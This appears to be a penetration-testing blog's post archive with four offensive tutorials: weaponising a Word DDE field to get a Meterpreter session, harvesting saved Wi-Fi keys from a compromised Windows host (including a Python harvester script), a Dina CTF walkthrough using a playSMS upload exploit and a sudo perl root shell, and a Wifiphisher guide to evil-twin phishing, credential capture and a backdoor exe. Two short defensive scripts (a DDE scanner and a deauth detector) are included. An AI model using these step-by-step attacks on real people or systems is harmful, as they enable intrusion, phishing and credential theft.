Showing posts with label Penetration Testing. Show all posts

Exploiting Windows Machine with DDE Exploit

DDE stands for "Dynamic Data Exchange", a legacy Windows inter-process communication mechanism that lets one application subscribe to data held by, or send commands to, another. The attack abuses a Word field that names an arbitrary program as the DDE server, so no macro is needed. Once the victim opens the Word file and accepts the prompts, Word launches that program, an HTA payload is retrieved over HTTP from the attacker's Metasploit listener and a Meterpreter session is returned.

Here is a step-by-step depiction of how it happens:
Copy the module code into Leafpad and save it with a ".rb" extension. You can name it anything you like; to avoid confusion, ours is named "dde_delivery.rb". This file now has to be moved into the windows section of the exploit folder in Metasploit; the path is given below.


Path of the windows exploit folder in Kali: /usr/share/metasploit-framework/modules/exploits/windows/

Here is what the module looks like once it has been pasted into the "windows" folder.


Now open a terminal and start Metasploit. Once it is up, type "use exploit/windows/dde_delivery" and the module will load (if Metasploit does not see the new file, run "reload_all" first). The only option you need to set is SRVHOST, the IP address of the HTTP server the victim will fetch the payload from, so it must be an address the victim can reach: type "set SRVHOST" followed by your IP, as in the screenshot below.
Press Enter and you're all set.
Type "exploit" and press Enter.
The module prints the DDE field text to paste into the document; it is highlighted in the screenshot below. Copy this text.
NOTE: Do not close the terminal; the HTTP server and the handler must stay running until the victim has opened the file.


Open Microsoft Word, go to the "Insert" tab and, under the "Text" section, click "Quick Parts"; in the drop-down menu you will see "Field…".


Click "Field…" and another window will appear. By default it looks like the screenshot pasted below; click OK.


Once you click OK, the text "!Unexpected End of Formula" appears. Select this text, right-click it and choose "Toggle Field Codes" from the menu.


Once this is done, the text changes to "{ = \* MERGEFORMAT }".


Replace the contents of the braces with the field text you copied from Metasploit, as seen below.


Save the file in ".docx" format (any name you like) and close Microsoft Word.







You now have a Word file that, when opened on a Windows 10 machine, hands you a session.
Here is what happens when the Word file is opened:
Once the file is opened, the following message appears; click "Yes".


Next this message appears. Again, click "Yes".


Finally this message appears; click "OK".


Now go back to the terminal in Kali for the good part.
The moment OK is clicked in the image above, Meterpreter comes online and you have a session, just like that!
Note that every one of those prompts is a chance for the victim to refuse, and that since Microsoft's ADV170021 update (December 2017) Word no longer honours DDE fields by default: unless the AllowDDE value under Word's Security registry key has been re-enabled on the target, the field is not executed and no program is launched.


If you were wondering why we made you copy the code into Leafpad and drop it into the Metasploit tree by hand at the start: at the time of writing this module was new and had not yet been merged into the Metasploit distribution.
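A defender's-side check for the document this post builds, added here as an example; it is not part of the original post or of the Metasploit module. A .docx is a zip of XML parts, and Word stores field codes either in a w:fldSimple attribute or as runs of w:instrText between fldChar begin/end markers (often split over several runs), so the scanner reassembles every field code and flags the ones starting with DDE or DDEAUTO. The two sample documents are built in memory and are constructed test data; the calc.exe command in the malicious one is an assumed placeholder, not the field text the module prints.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

W = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
DDE_RE = re.compile(r"^\s*DDE(AUTO)?\b", re.IGNORECASE)


def extract_field_codes(xml_bytes: bytes) -> list:
    """Return every field code in a WordprocessingML part, in document order.

    Complex fields are reassembled from all w:instrText runs between the
    fldChar begin and end markers, so 'DDE' + 'AUTO' split over two runs
    still comes back as one string. Simple fields carry the code in w:instr.
    """
    fields, open_fields = [], []
    for el in ET.fromstring(xml_bytes).iter():
        if el.tag == f"{{{W}}}fldSimple":
            fields.append(el.get(f"{{{W}}}instr", ""))
        elif el.tag == f"{{{W}}}fldChar":
            kind = el.get(f"{{{W}}}fldCharType")
            if kind == "begin":
                open_fields.append([])
            elif kind == "end" and open_fields:
                fields.append("".join(open_fields.pop()))
        elif el.tag == f"{{{W}}}instrText" and open_fields:
            open_fields[-1].append(el.text or "")
    return fields


def find_dde_fields(docx_bytes: bytes) -> list:
    """Scan every XML part under word/ (body, headers, footers, footnotes)
    and return (part name, normalised field code) for each DDE/DDEAUTO field."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if name.startswith("word/") and name.endswith(".xml"):
                for code in extract_field_codes(zf.read(name)):
                    if DDE_RE.match(code):
                        hits.append((name, " ".join(code.split())))
    return hits


def build_docx(document_xml: str) -> bytes:
    """Minimal in-memory .docx (only the parts the scanner needs), for testing."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", document_xml)
    return buf.getvalue()


# Constructed sample: the DDEAUTO keyword is split over two instrText runs and
# the command is a harmless placeholder, not the module's field text.
MALICIOUS_XML = f"""<w:document xmlns:w="{W}"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> DDE</w:instrText></w:r>
<w:r><w:instrText xml:space="preserve">AUTO c:\\\\windows\\\\system32\\\\cmd.exe "/k calc.exe" </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
</w:p></w:body></w:document>"""

# Constructed sample: the default field Word inserts plus a DATE field, no DDE.
BENIGN_XML = f"""<w:document xmlns:w="{W}"><w:body><w:p>
<w:r><w:fldChar w:fldCharType="begin"/></w:r>
<w:r><w:instrText xml:space="preserve"> = \\* MERGEFORMAT </w:instrText></w:r>
<w:r><w:fldChar w:fldCharType="end"/></w:r>
<w:fldSimple w:instr=" DATE \\@ &quot;d MMMM yyyy&quot; "/>
</w:p></w:body></w:document>"""


if __name__ == "__main__":
    for label, xml in (("malicious", MALICIOUS_XML), ("benign", BENIGN_XML)):
        print(label, find_dde_fields(build_docx(xml)))
```

Run it against a real document with find_dde_fields(open("file.docx", "rb").read()); a file that triggers the prompts in this post will show up with its full command line, and the split-run case is why the scanner joins runs instead of grepping the raw XML for "DDEAUTO".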
Have fun and stay ethical. 

Wifi Post Exploitation on Remote PC

The security protocols of Wi-Fi networks are often broken or bypassed, exposing wireless traffic to attackers. This article shows several ways to obtain the basic service set (BSS) information visible to a compromised Windows host, its current wireless connection and its saved wireless LAN profiles (including the stored keys), and finally how to disconnect the target's Wi-Fi. All of the following are post-exploitation attacks: they assume you already have a Meterpreter session on the target.
Table of Contents
  • Introduction
  • Working of Wi-Fi
  • Types of Wi-Fi security
  • WLAN BSS List
  • WLAN Current Connection
  • WLAN Profile
  • WLAN Disconnect
  • Mimikatz
  • Netsh

Introduction
Wireless local area networking technology is commonly known as Wi-Fi. It carries data over radio waves and is fast enough to provide high-speed internet access. The Wi-Fi trademark is owned by the Wi-Fi Alliance; technically it is a Wireless Local Area Network (WLAN) built on the IEEE 802.11 standards. It is supported by a wide range of devices such as mobile phones, PDAs, laptops and video game consoles, which lets all of them communicate easily.

Working of Wi-Fi
As the name suggests, a Wi-Fi network has no physical connection between sender and receiver. It uses radio frequencies within the electromagnetic spectrum, which is what allows it to provide high-speed internet. Every Wi-Fi connection goes through an Access Point (AP). The main job of an access point is to broadcast its signal so that nearby devices can detect it; once a device detects the signal it associates with the AP in order to use the network.

Types of Wi-Fi security
  • Wired Equivalent Privacy (WEP)
  • Wi-Fi Protected Access (WPA)
  • Wi-Fi Protected Access 2 (WPA2)

Netsh
Now that you have a session on the victim's PC, drop to a shell (meterpreter > shell) and use the following command to list the Wi-Fi networks the victim's PC has saved profiles for over time:


netsh wlan show profiles



Get BSS information of a remote user’s Wi-Fi connection

This module gathers information about the wireless Basic Service Sets visible to the victim machine,
e.g. it will give you the SSID and other important information about each wireless network in range.

msf > use post/windows/wlan/wlan_bss_list
msf post(wlan_bss_list) > set session 5

msf post(wlan_bss_list) > exploit


As the above image shows, the PC has at some point been connected to Pentest Lab, Sinos, POCO PHONE and ignit. Now we can use the following to get detailed information about the networks currently in range:

netsh wlan show networks mode=bssid


Now, use the following command to see the password of a particular Wi-Fi profile (the key is printed in clear text as "Key Content"):
netsh wlan show profile name="ignit" key=clear
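Running those two netsh commands by hand for every profile is tedious, so here is an added example (my own code, not part of the original post) that automates the harvest from a shell on the target: it parses the profile names out of "netsh wlan show profiles", fetches each profile with key=clear and pulls out the SSID, authentication, cipher and clear-text key. The two netsh transcripts embedded below are constructed sample output in the English Windows 10 format; the real run_netsh helper only works on a Windows host, and the offline run swaps in the sample transcripts instead.

```python
import re
import subprocess

# Column labels as printed by the English-language netsh on Windows 10
PROFILE_RE = re.compile(r"^\s*(?:All|Current) User Profile\s*:\s*(.+?)\s*$", re.MULTILINE)
FIELD_RES = {
    "ssid": re.compile(r'^\s*SSID name\s*:\s*"?(.*?)"?\s*$', re.MULTILINE),
    "authentication": re.compile(r"^\s*Authentication\s*:\s*(.+?)\s*$", re.MULTILINE),
    "cipher": re.compile(r"^\s*Cipher\s*:\s*(.+?)\s*$", re.MULTILINE),
    "key": re.compile(r"^\s*Key Content\s*:\s*(.+?)\s*$", re.MULTILINE),
}


def parse_profile_names(list_output: str) -> list:
    """Profile names from 'netsh wlan show profiles' (all-user and per-user)."""
    return PROFILE_RE.findall(list_output)


def parse_profile(detail_output: str) -> dict:
    """SSID, auth, cipher and clear-text key from 'show profile ... key=clear'.
    'key' stays None for 802.1X (Enterprise) profiles, which store no PSK."""
    result = {}
    for field, rx in FIELD_RES.items():
        m = rx.search(detail_output)
        result[field] = m.group(1) if m else None
    return result


def run_netsh(profile_name: str) -> str:
    """Fetch one profile on the target itself (Windows only). The name is
    quoted because profiles such as 'Pentest Lab' contain spaces."""
    cmd = f'netsh wlan show profile name="{profile_name}" key=clear'
    return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout


def harvest_wifi_profiles(list_output: str, fetch=run_netsh) -> list:
    """Combine the two steps: one dict per saved profile, in listing order."""
    results = []
    for name in parse_profile_names(list_output):
        entry = parse_profile(fetch(name))
        entry["profile"] = name
        results.append(entry)
    return results


# Constructed sample output of 'netsh wlan show profiles' on a Windows 10 host
SAMPLE_LIST = """
Profiles on interface Wi-Fi:

Group policy profiles (read only)
---------------------------------
    <None>

User profiles
-------------
    All User Profile     : Pentest Lab
    All User Profile     : ignit
"""

# Constructed sample output of 'show profile name=... key=clear' for each profile
SAMPLE_DETAILS = {
    "Pentest Lab": """
Profile Pentest Lab on interface Wi-Fi:
=======================================================================

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "Pentest Lab"
    Network type           : Infrastructure

Security settings
-----------------
    Authentication         : WPA2-Enterprise
    Cipher                 : CCMP
    Security key           : Present
""",
    "ignit": """
Profile ignit on interface Wi-Fi:
=======================================================================

Connectivity settings
---------------------
    Number of SSIDs        : 1
    SSID name              : "ignit"
    Network type           : Infrastructure

Security settings
-----------------
    Authentication         : WPA2-Personal
    Cipher                 : CCMP
    Security key           : Present
    Key Content            : ignit-psk-constructed
""",
}

if __name__ == "__main__":
    # offline run over the constructed transcripts; on the target use fetch=run_netsh
    for entry in harvest_wifi_profiles(SAMPLE_LIST, fetch=SAMPLE_DETAILS.get):
        print(entry)
```

On a target with a non-English Windows the column labels differ, so the regexes would need adjusting; the structure (label, colon, value) is the same.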




Get current Wi-Fi connection information of a remote user
This module gathers information about the current connection on each wireless lan interface on the target machine.
msf post(wlan_bss_list) > use post/windows/wlan/wlan_current_connection
msf post(wlan_current_connection) > set session 5
msf post(wlan_current_connection) > run


Get saved wireless LAN profile of a remote user
This module extracts saved Wireless LAN profiles. It will also try to decrypt the network key material. Behavior is slightly different between OS versions when it comes to WPA. In Windows Vista/7 we will get the passphrase. In Windows XP we will get the PBKDF2 derived key.
msf post(wlan_current_connection) > use post/windows/wlan/wlan_profile
msf post(wlan_profile) > set session 5
msf post(wlan_profile) > exploit



Disconnect a remote user’s Wi-Fi connection
This module disconnects the current wireless network connection on the specified interface.
msf > use post/windows/wlan/wlan_disconnect
msf post(wlan_disconnect) > set session 5
msf post(wlan_disconnect) > exploit


Other Way: Mimikatz
Mimikatz is best described as a post-exploitation toolkit, since it has many features far beyond dumping plain-text passwords. Meterpreter ships it as the kiwi extension:
meterpreter > load kiwi


meterpreter > help
The help output now lists the kiwi commands. The two below dump the entire list of saved wireless profiles, passwords included. Voila! You got it right.
meterpreter > wifi_list
meterpreter > wifi_list_shared



Hack the dina VM (CTF Challenge)


Today we are going to take on another CTF challenge, Dina. The credit for making this VM goes to "Touhid Shaikh". It is a boot2root challenge where we have to root the server and capture the flag to complete it. You can download this VM here.
Security Level: Beginner
Penetration Methodology:
1. Scanning
   · Netdiscover
   · Nmap
2. Enumeration
   · Nmap
   · Web directory search
3. Exploitation
   · Metasploit
4. Privilege Escalation
   · Exploiting sudo rights

Walkthrough: 

Scanning:

Let's start off by scanning the network to identify the host IP address. Using Netdiscover we identify the target as 192.168.43.219.
netdiscover
Then, as usual, we used our favourite tool Nmap for port enumeration and found that port 80 is open.
nmap -A 192.168.43.219

Enumeration:
Port 80 is open, so we opened the IP address in our browser, but the webpage itself had nothing useful.

The nmap scan also showed a robots.txt file, so we opened it in the browser.

robots.txt listed multiple directories. We tried each one in turn, and only /nothing turned out to be useful.

The page source of /nothing revealed a list of passwords that came in handy later.

With the passwords in hand we ran dirb to find any further directories where they could be used, and found /secure.
dirb http://192.168.43.219

The /secure directory holds a zip file named backup.zip, which we downloaded to our Kali machine.

The zip file turned out to be password protected, so we tried all the passwords found above; freedom was the correct one.

Extracting it gave us an mp3 file. Checking its type showed it is actually an ASCII text file; opening it gave us the username touhid and a directory name, /SecreTgatwayLogin.
file backup-cred.mp3
cat backup-cred.mp3
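The password trial against backup.zip above was done by hand; as an added example (my own code, not from the walkthrough) here is the same check automated, made self-contained with one twist: Python's zipfile can read traditional PKWARE ("ZipCrypto") encryption but cannot write it, so the block includes a minimal encryptor to build a stored, password-protected zip in memory and then tries each word-list candidate against it. The archive content and the word list are constructed, apart from "freedom", the password the walkthrough found. A wrong password is rejected either by the check byte in the 12-byte encryption header (RuntimeError) or, about one time in 256, by the CRC after the data has been decrypted (BadZipFile), so both are caught. Deflated members would need compressing before encryption, which this encryptor does not handle.

```python
import io
import os
import struct
import zipfile
import zlib

# CRC-32 table and the raw (non-inverted) per-byte update used by ZipCrypto's key schedule
_CRC_TABLE = []
for _i in range(256):
    _c = _i
    for _ in range(8):
        _c = (_c >> 1) ^ 0xEDB88320 if _c & 1 else _c >> 1
    _CRC_TABLE.append(_c)


def _crc_update(crc: int, byte: int) -> int:
    return _CRC_TABLE[(crc ^ byte) & 0xFF] ^ (crc >> 8)


class ZipCryptoEncryptor:
    """Traditional PKWARE encryption (APPNOTE section 6.1), encrypt direction.
    The cipher is weak (known-plaintext attacks exist); it is implemented here
    only so a test archive can be produced without a third-party library."""

    def __init__(self, password: bytes):
        self.k0, self.k1, self.k2 = 0x12345678, 0x23456789, 0x34567890
        for c in password:
            self._update(c)

    def _update(self, c: int) -> None:
        self.k0 = _crc_update(self.k0, c)
        self.k1 = ((self.k1 + (self.k0 & 0xFF)) * 134775813 + 1) & 0xFFFFFFFF
        self.k2 = _crc_update(self.k2, self.k1 >> 24)

    def encrypt(self, data: bytes) -> bytes:
        out = bytearray()
        for p in data:
            t = (self.k2 | 2) & 0xFFFF
            out.append(p ^ (((t * (t ^ 1)) >> 8) & 0xFF))
            self._update(p)          # the keys advance on the plaintext byte
        return bytes(out)


def make_encrypted_zip(name: str, content: bytes, password: bytes) -> bytes:
    """Single stored member, ZipCrypto-encrypted, readable by zipfile.ZipFile."""
    crc = zlib.crc32(content) & 0xFFFFFFFF
    # 12-byte encryption header: 11 random bytes plus the CRC's high byte, which
    # is the byte zipfile compares to reject a wrong password early
    payload = ZipCryptoEncryptor(password).encrypt(os.urandom(11) + bytes([crc >> 24]) + content)
    fname = name.encode()
    flags, method, dos_time, dos_date = 0x0001, 0, 0, 0x21   # bit 0 = encrypted; stored; 1980-01-01
    local = struct.pack("<4sHHHHHIIIHH", b"PK\x03\x04", 20, flags, method, dos_time, dos_date,
                        crc, len(payload), len(content), len(fname), 0) + fname
    central = struct.pack("<4sHHHHHHIIIHHHHHII", b"PK\x01\x02", 20, 20, flags, method, dos_time,
                          dos_date, crc, len(payload), len(content), len(fname), 0, 0, 0, 0, 0, 0) + fname
    eocd = struct.pack("<4sHHHHIIH", b"PK\x05\x06", 0, 0, 1, 1, len(central),
                       len(local) + len(payload), 0)
    return local + payload + central + eocd


def read_member(archive: bytes, password: str) -> bytes:
    """Decrypt and return the first member with a known password."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        return zf.read(zf.namelist()[0], pwd=password.encode())


def crack_zip(archive: bytes, candidates):
    """Try each candidate password; return the first that decrypts the first member, else None."""
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        member = zf.namelist()[0]
        for pwd in candidates:
            try:
                zf.read(member, pwd=pwd.encode())
                return pwd
            except (RuntimeError, zipfile.BadZipFile):   # bad check byte / bad CRC
                continue
    return None


# Constructed stand-in for backup.zip: the note inside and the word list are made up,
# apart from 'freedom', which is the password the walkthrough found.
SAMPLE_ZIP = make_encrypted_zip("backup-cred.mp3", b"touhid\n/SecreTgatwayLogin\n", b"freedom")
CANDIDATES = ["nothing", "Diana", "secure", "freedom", "touhid"]

if __name__ == "__main__":
    print(crack_zip(SAMPLE_ZIP, CANDIDATES))
```

For a real archive, pass open("backup.zip", "rb").read() and the candidate list scraped from the page source; the loop is fast enough for a handful of leaked passwords but is not a substitute for a proper cracker on a large word list.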

We opened that directory in the browser and got a playSMS login page. We used the username touhid and tried the passwords from the list found above; diana worked for us.


Exploitation:
In the exploitation phase we searched Metasploit for playSMS exploits and found two.
search playsms

We used the second one, which uploads our payload through playSMS's CSV import.
We set the required options, using the credentials found above as username and password.
use exploit/multi/http/playsms_uploadcsv_exec
set rhost 192.168.43.219
set lhost 192.168.43.171
set lport 4444
set username touhid
set password Diana
set targeturi /SecreTgatwayLogin
exploit


After running the exploit we got a Meterpreter session, then used a Python one-liner to get a proper TTY shell.
Checking the sudo permissions of the www-data user showed that it may run perl via sudo.
getuid
shell
python -c 'import pty; pty.spawn("/bin/sh")'
sudo -l

Privilege Escalation:
To elevate to root we abused the sudo right on perl, which can spawn a shell, and got a root shell. We then went to the root directory and found flag.txt.
sudo /usr/bin/perl -e 'exec "/bin/sh"'
whoami
cd /root
ls
cat flag.txt




WiFi Exploitation with WifiPhisher

Hello friends! Today we are going to demonstrate a Wi-Fi phishing attack using the excellent tool "Wifiphisher"; its description below gives more details.

Wifiphisher is a security tool that mounts automated, victim-customized phishing attacks against WiFi clients in order to obtain credentials or infect the victims with malware. It is primarily a social engineering attack that, unlike other methods, does not include any brute forcing. It is an easy way of obtaining credentials from captive portals and third-party login pages (e.g. in social networks) or WPA/WPA2 pre-shared keys.

Requirement
·         Kali Linux.
·         Two Wi-Fi adapters: one that supports AP mode and another that supports monitor mode.

Wifiphisher Working

After achieving a man-in-the-middle position using the Evil Twin or KARMA attack, Wifiphisher redirects all HTTP requests to an attacker-controlled phishing page.
From the victim's perspective, the attack consists of three phases:
1.       The victim is deauthenticated from her access point. Wifiphisher continuously jams all of the target access point's wifi devices within range by forging "Deauthenticate" or "Disassociate" packets to disrupt existing associations.
2.       The victim joins a rogue access point. Wifiphisher sniffs the area and copies the target access point's settings. It then creates a rogue wireless access point that is modeled on the target. It also sets up a NAT/DHCP server and forwards the right ports. Consequently, because of the jamming, clients will eventually start connecting to the rogue access point. After this phase, the victim is MiTMed. Furthermore, Wifiphisher listens to probe request frames and spoofs "known" open networks to cause automatic association.
3.       The victim is served a realistic, specially customized phishing page. Wifiphisher employs a minimal web server that responds to HTTP and HTTPS requests. As soon as the victim requests a page from the Internet, Wifiphisher responds with a realistic fake page that asks for credentials or serves malware. This page is specifically crafted for the victim. For example, a router config-looking page will contain logos of the victim's vendor. The tool supports community-built templates for different phishing scenarios.
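The jamming in phase 1 is what a wireless IDS sees first, so here is an added example of the detection side (my own code, not from the Wifiphisher project): it decodes raw 802.11 management frames just far enough to recognise Deauthentication (subtype 12) and Disassociation (subtype 10), counts them per BSSID in a sliding one-second window and raises an alert when a burst reaches a threshold, also recording how many were sent to the broadcast address and which reason codes were used. The capture below is constructed: forty forged broadcast deauths against one AP within half a second, two ordinary deauths from another AP a minute apart, and a beacon that the parser must ignore. A real capture from a monitor-mode interface carries radiotap headers, which this code assumes have already been stripped.

```python
import struct
from collections import Counter, defaultdict

MGMT, DISASSOC, DEAUTH = 0, 10, 12          # 802.11 frame type / management subtypes
BROADCAST = "ff:ff:ff:ff:ff:ff"


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def parse_disconnect_frame(frame: bytes):
    """Decode a bare 802.11 frame (no radiotap header). Returns
    (subtype, dst, src, bssid, reason) for deauth/disassoc frames, else None."""
    if len(frame) < 26:
        return None
    fc = frame[0]
    frame_type, subtype = (fc >> 2) & 0x3, fc >> 4
    if frame_type != MGMT or subtype not in (DEAUTH, DISASSOC):
        return None
    # header: FC(2) duration(2) addr1(6) addr2(6) addr3(6) seqctl(2), then the 2-byte reason code
    dst, src, bssid = frame[4:10], frame[10:16], frame[16:22]
    (reason,) = struct.unpack_from("<H", frame, 24)
    return subtype, mac_str(dst), mac_str(src), mac_str(bssid), reason


def detect_deauth_flood(capture, window=1.0, threshold=10):
    """capture: iterable of (timestamp_seconds, frame_bytes). Returns one alert
    per BSSID whose deauth/disassoc count inside any `window`-second span
    reaches `threshold`."""
    per_bssid = defaultdict(list)
    for ts, frame in capture:
        parsed = parse_disconnect_frame(frame)
        if parsed:
            per_bssid[parsed[3]].append((ts, parsed))
    alerts = []
    for bssid, events in per_bssid.items():
        events.sort(key=lambda e: e[0])
        peak, start = 0, 0
        for end in range(len(events)):          # two-pointer sliding window
            while events[end][0] - events[start][0] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts.append({
                "bssid": bssid,
                "peak_per_window": peak,
                "total": len(events),
                "broadcast": sum(1 for _, p in events if p[1] == BROADCAST),
                "reasons": dict(Counter(p[4] for _, p in events)),
            })
    return alerts


def build_mgmt_frame(subtype: int, dst: bytes, src: bytes, bssid: bytes, body: bytes = b"") -> bytes:
    """Assemble a minimal management frame; used only to construct the sample capture."""
    frame_control = bytes([(subtype << 4) | (MGMT << 2), 0x00])
    return frame_control + b"\x00\x00" + dst + src + bssid + b"\x00\x00" + body


# Constructed sample capture (no real networks involved)
AP_A = bytes.fromhex("aabbccddee01")
AP_B = bytes.fromhex("aabbccddee02")
STA = bytes.fromhex("001122334455")
BCAST = b"\xff" * 6

SAMPLE_CAPTURE = (
    # 40 forged broadcast deauths spoofing AP_A, reason 7, 10 ms apart
    [(i * 0.01, build_mgmt_frame(DEAUTH, BCAST, AP_A, AP_A, struct.pack("<H", 7))) for i in range(40)]
    # two legitimate deauths from AP_B to one client a minute apart (reason 3 = station leaving)
    + [(0.0, build_mgmt_frame(DEAUTH, STA, AP_B, AP_B, struct.pack("<H", 3))),
       (60.0, build_mgmt_frame(DEAUTH, STA, AP_B, AP_B, struct.pack("<H", 3)))]
    # a beacon (subtype 8) from AP_A, which must be ignored
    + [(0.5, build_mgmt_frame(8, BCAST, AP_A, AP_A, b"\x00" * 12))]
)

if __name__ == "__main__":
    for alert in detect_deauth_flood(SAMPLE_CAPTURE):
        print(alert)
```

A high share of broadcast-addressed frames with a single repeated reason code is the signature worth alerting on; real APs deauthenticate individual stations with varied reasons and never at this rate.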

Let’s start!!!
Open a terminal in Kali Linux and run the following command to download Wifiphisher from GitHub:

git clone https://github.com/wifiphisher/wifiphisher.git


Once the download completes, run the setup script to install it together with its dependencies:
cd wifiphisher/
python setup.py install


Now launch the tool by typing wifiphisher in the terminal (it needs root); the attack that follows is essentially social engineering.


It lists the networks in range, as shown in the image, and lets the attacker pick the ESSID/BSSID of the target network to impersonate; it then runs both the Evil Twin and KARMA attacks against that network's clients.

From the list I targeted "iball-baton" to trap the clients connected to it.


After that you get four phishing scenarios to choose from:
1.       Firmware Upgrade page
2.       Network Manager connect
3.       Browser plugin update
4.       Oauth login Page

Now let’s go through each phishing scenario one by one starting from 1st option.

Firmware Upgrade page: a router configuration page without logos or brands that asks for the WPA/WPA2 password, justified by a firmware upgrade.


The victim may take it for an official notification and submit the Wi-Fi password to start the upgrade. As soon as the WPA/WPA2 password is entered and "Start Upgrade" is clicked, a fake upgrade process is shown.


The following image tells the victim that the firmware is being upgraded and not to close the page until it completes, while in the background the attacker has already captured the WPA/WPA2 password.




Repeat the same step to select the ESSID.


Now let us go through the second phishing scenario.

Network Manager Connect: imitates the behaviour of the operating system's network manager. This template shows Chrome's "Connection Failed" page and displays a network manager window asking for the pre-shared key. Currently the network managers of Windows and macOS are supported.


Here the target clicks "Connect" to reconnect to the network.


It asks for the password of the selected network, while in the background the attacker captures the WPA/WPA2 password.



Great! Again you can confirm the captured WPA/WPA2 password in the image below: ram123456ram


Repeat the same step to choose the ESSID to attack.


Browser plugin update: a generic browser plugin update page that can be used to serve payloads to victims.


Wifiphisher creates an exe payload and runs a multi/handler in the background to receive the reverse connection from the victim's system.





When the victim clicks "Update Now", an update.exe file is downloaded to the victim's system; it is nothing but an exe backdoor that gives the attacker unauthorized access.


Awesome! The attacker gets a reverse connection from the target's system; in the image below you can see that meterpreter session 1 has opened.


Repeat the same step to choose the ESSID to attack.


Now move on to the last, fourth option.

OAuth Login Page: a free Wi-Fi service asking for Facebook credentials to authenticate using OAuth.


This time, when the victim opens a browser he is met by a phishing page titled "Get Connected to the Internet For Free", as shown in the image.
When he enters his Facebook credentials to get free internet, he falls for the phishing attack.


Here you can see that as the victim enters his username and password and clicks "Log in", he gets an error message, while the attacker has captured his Facebook credentials.


Wonderful! The attacker has successfully trapped the victim and captured his Facebook account credentials.